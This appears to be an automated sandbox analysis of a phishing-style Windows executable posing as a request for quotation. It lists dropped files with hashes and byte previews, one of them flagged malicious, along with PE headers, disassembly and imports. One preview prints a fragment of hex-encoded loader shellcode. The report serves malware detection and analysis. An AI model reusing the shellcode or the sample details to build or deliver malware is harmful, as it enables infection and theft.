                  Process:C:\Windows\SysWOW64\RMActivate_ssp.exe
                  File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                  Category:dropped
                  Size (bytes):114688
                  Entropy (8bit):0.9746603542602881
                  Encrypted:false
                  SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                  MD5:780853CDDEAEE8DE70F28A4B255A600B
                  SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                  SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                  SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                  Malicious:false
                  Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                  C:\Users\user\AppData\Local\Temp\3-zmD5K6

                  Download File
                  Process:C:\Windows\SysWOW64\runonce.exe
                  File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                  Category:dropped
                  Size (bytes):114688
                  Entropy (8bit):0.9746603542602881
                  Encrypted:false
                  SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                  MD5:780853CDDEAEE8DE70F28A4B255A600B
                  SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                  SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                  SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                  Malicious:false
                  Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                  C:\Users\user\AppData\Local\Temp\autC7F3.tmp

                  Download File
                  Process:C:\Users\user\Desktop\RFQ - MK FMHS.RFQ.24.101.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):270848
                  Entropy (8bit):7.993244785648878
                  Encrypted:true
                  SSDEEP:6144:xhlfcgqOqWNrxIpeqFJ+G2nq9K4rq5SF8WEAC3nEAdDgusdrz:xffcYrxIpeqrTY2ti3E08usdrz
                  MD5:ECF90CC94EEEC79DEA97EF11D475013F
                  SHA1:1E1A28C4CA539DAC233CC039CA7757AD22D88801
                  SHA-256:1145CB96A68E5BD2CD09FB2E63BFEDA6F8E07FAF08EAE190376CE838F3E7A7A9
                  SHA-512:A1A899144C1FC0ECCE1FE65CC3ECB0C6C634694D086F3A99E082A7A0F73BF9A4906884A00DF843E5A0EA775CD3D5E46EBEAE2DB47FDA4B8E7264F45F3B195F87
                  Malicious:false
                  Preview:.m.e.BWWS...\....7@..{S;..GVA7S7CBWWSP34UEGVA7S7CBWWSP34.EGVO(.9C.^.r.2x.d.>(DsG1-0%2=.W4+)95.1Rc0"9s9]....v,X7RmOZ]wP34UEGV86Z.~"0.n0T.h% .[...y"0.I...i% .[...."0..9P\h% .A7S7CBWW..34.DFV0Wm`CBWWSP34.EEWJ6X7CRSWSP34UEGV.$S7CRWWSp74UE.VA'S7C@WWUP34UEGVG7S7CBWWSp74UGGVA7S7AB..SP#4UUGVA7C7CRWWSP34EEGVA7S7CBWWSP34UEGVA7S7CBWWSP34UEGVA7S7CBWWSP34UEGVA7S7CBWWSP34UEGVA7S7CBWWSP34UEGVA7S7CBWWSP34UEGVA7S7CBWWSP34UEGVA7S7CBWWSP34UEGVoC6O7BWW._74UUGVA'W7CRWWSP34UEGVA7S7cBW7SP34UEGVA7S7CBWWSP34UEGVA7S7CBWWSP34UEGVA7S7CBWWSP34UEGVA7S7CBWWSP34UEGVA7S7CBWWSP34UEGVA7S7CBWWSP34UEGVA7S7CBWWSP34UEGVA7S7CBWWSP34UEGVA7S7CBWWSP34UEGVA7S7CBWWSP34UEGVA7S7CBWWSP34UEGVA7S7CBWWSP34UEGVA7S7CBWWSP34UEGVA7S7CBWWSP34UEGVA7S7CBWWSP34UEGVA7S7CBWWSP34UEGVA7S7CBWWSP34UEGVA7S7CBWWSP34UEGVA7S7CBWWSP34UEGVA7S7CBWWSP34UEGVA7S7CBWWSP34UEGVA7S7CBWWSP34UEGVA7S7CBWWSP34UEGVA7S7CBWWSP34UEGVA7S7CBWWSP34UEGVA7S7CBWWSP34UEGVA7S7CBWWSP34UEGVA7S7CBWWSP34UEGVA7S7CBWWSP34UEGVA7S7CBWWSP34UEGVA7S7CBWWSP34UEGVA7S7CBWWSP34UEGVA7S7CBWW

                  C:\Users\user\AppData\Local\Temp\autC833.tmp

                  Download File
                  Process:C:\Users\user\Desktop\RFQ - MK FMHS.RFQ.24.101.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):9816
                  Entropy (8bit):7.599592768271719
                  Encrypted:false
                  SSDEEP:192:65jwEiqEH1WgUJuzJkecGgJo7xocBk3mxhGQedF1POj8LktFp1F:I6qEHYV0eecGGo7xocBpcxB81npL
                  MD5:32866B2C1D7E56C9E8ADEF439F4582B8
                  SHA1:EA23006855335659F193A252331E8796C71832F2
                  SHA-256:2639BE9CB75B7272404FC7658CB0EAA6C2DCF75CD09F612F1F344A0F58879BA5
                  SHA-512:890D775B173AAC55877D6C20A6CD907F3285CD0DA686322411E5625AF6A5879733643F59D3D607647A60D7B4A5E5120FDC529174661D3F826D0DDC3F71B128F5
                  Malicious:false
                  Preview:EA06..pT.Q&...8.M.z,.D.Lf....y9......o3.N&T...5...j..m1..f.Y..cD.L'.....3.N(s...m9...s.5..8.L/.Y...e..&6[...0.L..I..k7.N&. ..a0.M.....q4.Nf.P.....K..d.%...p.lY@.......c.Xf.0.o..b.L.`...,@. ...3+..d....s4.l&..........|....sa...`.........Y&.K0.....-vs5.M..2...N&.I...@.>..........$.0...fx. ..$l...I...#..$6...... ..... .Z...a.5..&.).....L.j.;$....M.j.;$....X@j.;%....Y@j.;,.....j.e.|f #^...j......l.....l.5....>0..Xf....M.^....$zn.....G..I....C...M.|........}S{....7...| l..P..........0...`>;..c7.6..{......=..7..............6,......b...,S ...i5.M.4.b..i|v)....b.h.,@..%........9....c...|3Y..h......._......@.>K...,v[..q5.M,.@..i7.X......9....2.......,.`....3.,.i8........}.k(.f..@..M&V....7.,.x....&.......0.......Fh...Fb.....3.."a9...`....,vb.....cd.X..P.Fl.Y.$..c. ....I...d..f.!...,vd......8..P.......0.....2...y...D.......c.0.......b.<NA...NM..;4.X.q1..&@Q..B.Y.ah......Yl.i..."..Bvj.........ic..'3Y..'f.....,j.1........C.`....7b.., .p..T.......Y,Vi......@

                  C:\Users\user\AppData\Local\Temp\finitism

                  Download File
                  Process:C:\Users\user\Desktop\RFQ - MK FMHS.RFQ.24.101.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):270848
                  Entropy (8bit):7.993244785648878
                  Encrypted:true
                  SSDEEP:6144:xhlfcgqOqWNrxIpeqFJ+G2nq9K4rq5SF8WEAC3nEAdDgusdrz:xffcYrxIpeqrTY2ti3E08usdrz
                  MD5:ECF90CC94EEEC79DEA97EF11D475013F
                  SHA1:1E1A28C4CA539DAC233CC039CA7757AD22D88801
                  SHA-256:1145CB96A68E5BD2CD09FB2E63BFEDA6F8E07FAF08EAE190376CE838F3E7A7A9
                  SHA-512:A1A899144C1FC0ECCE1FE65CC3ECB0C6C634694D086F3A99E082A7A0F73BF9A4906884A00DF843E5A0EA775CD3D5E46EBEAE2DB47FDA4B8E7264F45F3B195F87
                  Malicious:false
                  Preview:.m.e.BWWS...\....7@..{S;..GVA7S7CBWWSP34UEGVA7S7CBWWSP34.EGVO(.9C.^.r.2x.d.>(DsG1-0%2=.W4+)95.1Rc0"9s9]....v,X7RmOZ]wP34UEGV86Z.~"0.n0T.h% .[...y"0.I...i% .[...."0..9P\h% .A7S7CBWW..34.DFV0Wm`CBWWSP34.EEWJ6X7CRSWSP34UEGV.$S7CRWWSp74UE.VA'S7C@WWUP34UEGVG7S7CBWWSp74UGGVA7S7AB..SP#4UUGVA7C7CRWWSP34EEGVA7S7CBWWSP34UEGVA7S7CBWWSP34UEGVA7S7CBWWSP34UEGVA7S7CBWWSP34UEGVA7S7CBWWSP34UEGVA7S7CBWWSP34UEGVA7S7CBWWSP34UEGVA7S7CBWWSP34UEGVoC6O7BWW._74UUGVA'W7CRWWSP34UEGVA7S7cBW7SP34UEGVA7S7CBWWSP34UEGVA7S7CBWWSP34UEGVA7S7CBWWSP34UEGVA7S7CBWWSP34UEGVA7S7CBWWSP34UEGVA7S7CBWWSP34UEGVA7S7CBWWSP34UEGVA7S7CBWWSP34UEGVA7S7CBWWSP34UEGVA7S7CBWWSP34UEGVA7S7CBWWSP34UEGVA7S7CBWWSP34UEGVA7S7CBWWSP34UEGVA7S7CBWWSP34UEGVA7S7CBWWSP34UEGVA7S7CBWWSP34UEGVA7S7CBWWSP34UEGVA7S7CBWWSP34UEGVA7S7CBWWSP34UEGVA7S7CBWWSP34UEGVA7S7CBWWSP34UEGVA7S7CBWWSP34UEGVA7S7CBWWSP34UEGVA7S7CBWWSP34UEGVA7S7CBWWSP34UEGVA7S7CBWWSP34UEGVA7S7CBWWSP34UEGVA7S7CBWWSP34UEGVA7S7CBWWSP34UEGVA7S7CBWWSP34UEGVA7S7CBWWSP34UEGVA7S7CBWWSP34UEGVA7S7CBWW

                  C:\Users\user\AppData\Local\Temp\murky

                  Download File
                  Process:C:\Users\user\Desktop\RFQ - MK FMHS.RFQ.24.101.exe
                  File Type:ASCII text, with very long lines (28756), with no line terminators
                  Category:dropped
                  Size (bytes):28756
                  Entropy (8bit):3.5869856049536324
                  Encrypted:false
                  SSDEEP:768:miTZ+2QoioGRk6ZklputwjpjBkCiw2RuJ3nXKUrvzjsNbd+IH6B34vfF3if6gyCQ:miTZ+2QoioGRk6ZklputwjpjBkCiw2RH
                  MD5:CA3BDAD4122F198343018E0F5960CF4B
                  SHA1:ABB213CE0969ECD783185DB7A916403292B5E02A
                  SHA-256:B955D493759D01AEBB11CFD04A8941849C1A716214CD6BB59405C183E6C21E0B
                  SHA-512:E85D738A74EE8C42377B4E31744F06D623D88DBCF03508587B2D42D469A8B5721AB2697407FD6C423F8D62C4AB08C5C62051D4EBA9192CD7C7DBAFAF6EC3BD41
                  Malicious:false
                  Preview:8D6804F867D7E3ED21599F86932DA5673082A29A59B06B261C54E6F1DF089BBB368C973697738FDC880x558bec81eccc0200005657b86b00000066894584b96500000066894d86ba7200000066895588b86e0000006689458ab96500000066894d8cba6c0000006689558eb83300000066894590b93200000066894d92ba2e00000066895594b86400000066894596b96c00000066894d98ba6c0000006689559a33c06689459cb96e00000066898d44ffffffba7400000066899546ffffffb86400000066898548ffffffb96c00000066898d4affffffba6c0000006689954cffffffb82e0000006689854effffffb96400000066898d50ffffffba6c00000066899552ffffffb86c00000066898554ffffff33c966898d56ffffffba75000000668955d0b873000000668945d2b96500000066894dd4ba72000000668955d6b833000000668945d8b93200000066894ddaba2e000000668955dcb864000000668945deb96c00000066894de0ba6c000000668955e233c0668945e4b96100000066898d68ffffffba640000006689956affffffb8760000006689856cffffffb96100000066898d6effffffba7000000066899570ffffffb86900000066898572ffffffb93300000066898d74ffffffba3200000066899576ffffffb82e00000066898578ffffffb96400000066898d7affffff

                  C:\Users\user\AppData\Local\Temp\xl9lsbb.exe

                  Download File
                  Process:C:\Windows\SysWOW64\RMActivate_ssp.exe
                  File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                  Category:dropped
                  Size (bytes):984064
                  Entropy (8bit):7.950714934497661
                  Encrypted:false
                  SSDEEP:24576:fU8Gw/b1JQTj374gt7R7J9xCL8+cnVOdsMrxtY:fTGGJQTj374WdJ9xCL8+cVyrvY
                  MD5:C2F2B08E34FC25D172F2C3FCAB1ACFEB
                  SHA1:FC049C6F2B1D2BE76D7DC1BA79BAE9800C647145
                  SHA-256:9929D074C5FD1959151C22D3575B398805D52E1922DAEECFABCE860F9DFC1DC2
                  SHA-512:A80601EBE5E8C80B50A2944BF45D842282E8186BA23CBD68ABBA09CFB9B61F18FD51A3DDDD2075F706DEE4695D1B4C5D4006049FA1ED32F43852696C523AB42B
                  Malicious:true
                  Antivirus:
                  • Antivirus: Joe Sandbox ML, Detection: 100%
                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....:................0......f......2.... ........@.. .......................`............@....................................O........d...................@..........p............................................ ............... ..H............text...8.... ...................... ..`.rsrc....d.......d..................@..@.reloc.......@......................@..B........................H.......Xk...E......5....................................................0............}.....s....}......}.....(.......(......{.....o.....(C........,b..{....r...po......r...po......{....(J......(....o......{.....o......{....r...po.......}.....8U......}.....{....r)..po......r)..po.....(C.....{.....oX......(....o......{.....oZ...o......{.....o^......(....o......{.....o\......(....o......{.....o`......(....o......{.....ob......(....o......u...........,H..{.....o......{....r...po.

                  Static File Info

                  General

                  File type:PE32 executable (GUI) Intel 80386, for MS Windows
                  Entropy (8bit):7.122981106826642
                  TrID:
                  • Win32 Executable (generic) a (10002005/4) 99.96%
                  • Generic Win/DOS Executable (2004/3) 0.02%
                  • DOS Executable Generic (2002/1) 0.02%
                  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                  File name:RFQ - MK FMHS.RFQ.24.101.exe
                  File size:1'173'504 bytes
                  MD5:c8fe2e7043d030cf93cdab759d44f5e4
                  SHA1:fb166f49af2527ca5b90fa2538c2520727687331
                  SHA256:f78ebb5c21f07a42ed4351b7b8639d780f9d99a9afbb749daeaab9af97511acd
                  SHA512:e4220efb5f813dbaaa260b0eafcd8da984fa5a5afa19d73e2ee82dfc166e1be731de163c6ae6bd1a510db672fe51d5289bcbc841812774de1ff29638b77bb75b
                  SSDEEP:24576:ZAHnh+eWsN3skA4RV1Hom2KXMmHakd9o4h8wXiuSWAcnOJZ5:gh+ZkldoPK8Yakd9o49iq1Oh
                  TLSH:6745AD0273D2C036FFAB92739B6AB6059ABC79254133852F13981DB9BD701B1163E763
                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........s..R...R...R....C..P.....;.S..._@#.a..._@......_@..g...[j..[...[jo.w...R...r.............#.S..._@'.S...R.k.S.....".S...RichR..

                  File Icon

                  Icon Hash:aaf3e3e3938382a0

                  Static PE Info

                  General

                  Entrypoint:0x42800a
                  Entrypoint Section:.text
                  Digitally signed:false
                  Imagebase:0x400000
                  Subsystem:windows gui
                  Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                  DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                  Time Stamp:0x6685E41D [Wed Jul 3 23:51:57 2024 UTC]
                  TLS Callbacks:
                  CLR (.Net) Version:
                  OS Version Major:5
                  OS Version Minor:1
                  File Version Major:5
                  File Version Minor:1
                  Subsystem Version Major:5
                  Subsystem Version Minor:1
                  Import Hash:afcdf79be1557326c854b6e20cb900a7

                  Entrypoint Preview

                  Instruction
                  call 00007FCF4C893F0Dh
                  jmp 00007FCF4C886CC4h
                  int3
                  int3
                  int3
                  int3
                  int3
                  int3
                  int3
                  int3
                  int3
                  int3
                  int3
                  int3
                  push edi
                  push esi
                  mov esi, dword ptr [esp+10h]
                  mov ecx, dword ptr [esp+14h]
                  mov edi, dword ptr [esp+0Ch]
                  mov eax, ecx
                  mov edx, ecx
                  add eax, esi
                  cmp edi, esi
                  jbe 00007FCF4C886E4Ah
                  cmp edi, eax
                  jc 00007FCF4C8871AEh
                  bt dword ptr [004C41FCh], 01h
                  jnc 00007FCF4C886E49h
                  rep movsb
                  jmp 00007FCF4C88715Ch
                  cmp ecx, 00000080h
                  jc 00007FCF4C887014h
                  mov eax, edi
                  xor eax, esi
                  test eax, 0000000Fh
                  jne 00007FCF4C886E50h
                  bt dword ptr [004BF324h], 01h
                  jc 00007FCF4C887320h
                  bt dword ptr [004C41FCh], 00000000h
                  jnc 00007FCF4C886FEDh
                  test edi, 00000003h
                  jne 00007FCF4C886FFEh
                  test esi, 00000003h
                  jne 00007FCF4C886FDDh
                  bt edi, 02h
                  jnc 00007FCF4C886E4Fh
                  mov eax, dword ptr [esi]
                  sub ecx, 04h
                  lea esi, dword ptr [esi+04h]
                  mov dword ptr [edi], eax
                  lea edi, dword ptr [edi+04h]
                  bt edi, 03h
                  jnc 00007FCF4C886E53h
                  movq xmm1, qword ptr [esi]
                  sub ecx, 08h
                  lea esi, dword ptr [esi+08h]
                  movq qword ptr [edi], xmm1
                  lea edi, dword ptr [edi+08h]
                  test esi, 00000007h
                  je 00007FCF4C886EA5h
                  bt esi, 03h

                  Rich Headers

                  Programming Language:
                  • [ASM] VS2013 build 21005
                  • [ C ] VS2013 build 21005
                  • [C++] VS2013 build 21005
                  • [ C ] VS2008 SP1 build 30729
                  • [IMP] VS2008 SP1 build 30729
                  • [ASM] VS2013 UPD5 build 40629
                  • [RES] VS2013 build 21005
                  • [LNK] VS2013 UPD5 build 40629

                  Data Directories

                  NameVirtual AddressVirtual Size Is in Section
                  IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                  IMAGE_DIRECTORY_ENTRY_IMPORT0xbc0cc0x17c.rdata
                  IMAGE_DIRECTORY_ENTRY_RESOURCE0xc80000x54174.rsrc
                  IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                  IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                  IMAGE_DIRECTORY_ENTRY_BASERELOC0x11d0000x7134.reloc
                  IMAGE_DIRECTORY_ENTRY_DEBUG0x92bc00x1c.rdata
                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                  IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0xa4b500x40.rdata
                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                  IMAGE_DIRECTORY_ENTRY_IAT0x8f0000x884.rdata
                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                  IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                  Sections

                  NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                  .text0x10000x8dfdd0x8e000310e36668512d53489c005622bb1b4a9False0.5735602580325704data6.675248351711057IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                  .rdata0x8f0000x2fd8e0x2fe00748cf1ab2605ce1fd72d53d912abb68fFalse0.32828818537859006data5.763244005758284IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                  .data0xbf0000x8f740x5200aae9601d920f07080bdfadf43dfeff12False0.1017530487804878data1.1963819235530628IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  .rsrc0xc80000x541740x54200f5f0aae17c8e70c7089288959b76635bFalse0.9220549312778603data7.881021773489041IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                  .reloc0x11d0000x71340x7200f04128ad0f87f42830e4a6cdbc38c719False0.7617530153508771data6.783955557128661IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                  Resources

                  NameRVASizeTypeLanguageCountryZLIB Complexity
                  RT_ICON0xc85a80x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.7466216216216216
                  RT_ICON0xc86d00x128Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colorsEnglishGreat Britain0.3277027027027027
                  RT_ICON0xc87f80x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.3885135135135135
                  RT_ICON0xc89200x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 0EnglishGreat Britain0.3333333333333333
                  RT_ICON0xc8c080x128Device independent bitmap graphic, 16 x 32 x 4, image size 0EnglishGreat Britain0.5
                  RT_ICON0xc8d300xea8Device independent bitmap graphic, 48 x 96 x 8, image size 0EnglishGreat Britain0.2835820895522388
                  RT_ICON0xc9bd80x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0EnglishGreat Britain0.37906137184115524
                  RT_ICON0xca4800x568Device independent bitmap graphic, 16 x 32 x 8, image size 0EnglishGreat Britain0.23699421965317918
                  RT_ICON0xca9e80x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0EnglishGreat Britain0.13858921161825727
                  RT_ICON0xccf900x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0EnglishGreat Britain0.25070356472795496
                  RT_ICON0xce0380x468Device independent bitmap graphic, 16 x 32 x 32, image size 0EnglishGreat Britain0.3173758865248227
                  RT_MENU0xce4a00x50dataEnglishGreat Britain0.9
                  RT_STRING0xce4f00x594dataEnglishGreat Britain0.3333333333333333
                  RT_STRING0xcea840x68adataEnglishGreat Britain0.2747909199522103
                  RT_STRING0xcf1100x490dataEnglishGreat Britain0.3715753424657534
                  RT_STRING0xcf5a00x5fcdataEnglishGreat Britain0.3087467362924282
                  RT_STRING0xcfb9c0x65cdataEnglishGreat Britain0.34336609336609336
                  RT_STRING0xd01f80x466dataEnglishGreat Britain0.3605683836589698
                  RT_STRING0xd06600x158Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0EnglishGreat Britain0.502906976744186
                  RT_RCDATA0xd07b80x4b43adata1.000327622112222
                  RT_GROUP_ICON0x11bbf40x76dataEnglishGreat Britain0.6610169491525424
                  RT_GROUP_ICON0x11bc6c0x14dataEnglishGreat Britain1.25
                  RT_GROUP_ICON0x11bc800x14dataEnglishGreat Britain1.15
                  RT_GROUP_ICON0x11bc940x14dataEnglishGreat Britain1.25
                  RT_VERSION0x11bca80xdcdataEnglishGreat Britain0.6181818181818182
                  RT_MANIFEST0x11bd840x3efASCII text, with CRLF line terminatorsEnglishGreat Britain0.5074478649453823

                  Imports

                  DLLImport
                  WSOCK32.dllWSACleanup, socket, inet_ntoa, setsockopt, ntohs, recvfrom, ioctlsocket, htons, WSAStartup, __WSAFDIsSet, select, accept, listen, bind, closesocket, WSAGetLastError, recv, sendto, send, inet_addr, gethostbyname, gethostname, connect
                  VERSION.dllGetFileVersionInfoW, GetFileVersionInfoSizeW, VerQueryValueW
                  WINMM.dlltimeGetTime, waveOutSetVolume, mciSendStringW
                  COMCTL32.dllImageList_ReplaceIcon, ImageList_Destroy, ImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, InitCommonControlsEx, ImageList_Create
                  MPR.dllWNetUseConnectionW, WNetCancelConnection2W, WNetGetConnectionW, WNetAddConnection2W
                  WININET.dllInternetQueryDataAvailable, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetQueryOptionW, HttpOpenRequestW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetReadFile, InternetConnectW
                  PSAPI.DLLGetProcessMemoryInfo
                  IPHLPAPI.DLLIcmpCreateFile, IcmpCloseHandle, IcmpSendEcho
                  USERENV.dllDestroyEnvironmentBlock, UnloadUserProfile, CreateEnvironmentBlock, LoadUserProfileW
                  UxTheme.dllIsThemeActive
                  KERNEL32.dllDuplicateHandle, CreateThread, WaitForSingleObject, HeapAlloc, GetProcessHeap, HeapFree, Sleep, GetCurrentThreadId, MultiByteToWideChar, MulDiv, GetVersionExW, IsWow64Process, GetSystemInfo, FreeLibrary, LoadLibraryA, GetProcAddress, SetErrorMode, GetModuleFileNameW, WideCharToMultiByte, lstrcpyW, lstrlenW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, SetEndOfFile, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, SetCurrentDirectoryW, GetLongPathNameW, GetShortPathNameW, DeleteFileW, FindNextFileW, CopyFileExW, MoveFileW, CreateDirectoryW, RemoveDirectoryW, SetSystemPowerState, QueryPerformanceFrequency, FindResourceW, LoadResource, LockResource, SizeofResource, EnumResourceNamesW, OutputDebugStringW, GetTempPathW, GetTempFileNameW, DeviceIoControl, GetLocalTime, CompareStringW, GetCurrentProcess, EnterCriticalSection, LeaveCriticalSection, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, LoadLibraryExW, FindResourceExW, CopyFileW, VirtualFree, FormatMessageW, GetExitCodeProcess, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, SetFileAttributesW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, HeapReAlloc, HeapSize, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetProcessIoCounters, CreateProcessW, GetProcessId, SetPriorityClass, LoadLibraryW, VirtualAlloc, IsDebuggerPresent, GetCurrentDirectoryW, lstrcmpiW, DecodePointer, GetLastError, RaiseException, InitializeCriticalSectionAndSpinCount, DeleteCriticalSection, InterlockedDecrement, InterlockedIncrement, GetCurrentThread, CloseHandle, GetFullPathNameW, EncodePointer, ExitProcess, GetModuleHandleExW, ExitThread, GetSystemTimeAsFileTime, ResumeThread, GetCommandLineW, IsProcessorFeaturePresent, IsValidCodePage, GetACP, GetOEMCP, GetCPInfo, SetLastError, UnhandledExceptionFilter, SetUnhandledExceptionFilter, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, GetStartupInfoW, GetStringTypeW, SetStdHandle, GetFileType, GetConsoleCP, GetConsoleMode, RtlUnwind, ReadConsoleW, GetTimeZoneInformation, GetDateFormatW, GetTimeFormatW, LCMapStringW, GetEnvironmentStringsW, FreeEnvironmentStringsW, WriteConsoleW, FindClose, SetEnvironmentVariableA
                  USER32.dllAdjustWindowRectEx, CopyImage, SetWindowPos, GetCursorInfo, RegisterHotKey, ClientToScreen, GetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, MonitorFromPoint, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DrawMenuBar, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, CallWindowProcW, ReleaseCapture, SetCapture, CreateIconFromResourceEx, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, TrackPopupMenuEx, GetCursorPos, DeleteMenu, SetRect, GetMenuItemID, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, MonitorFromRect, keybd_event, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, GetWindowThreadProcessId, AttachThreadInput, GetFocus, GetWindowTextW, ScreenToClient, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, GetUserObjectSecurity, MessageBoxW, DefWindowProcW, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, GetMessageW, LockWindowUpdate, DispatchMessageW, TranslateMessage, PeekMessageW, UnregisterHotKey, CheckMenuRadioItem, CharLowerBuffW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, SystemParametersInfoW, LoadImageW, GetClassNameW
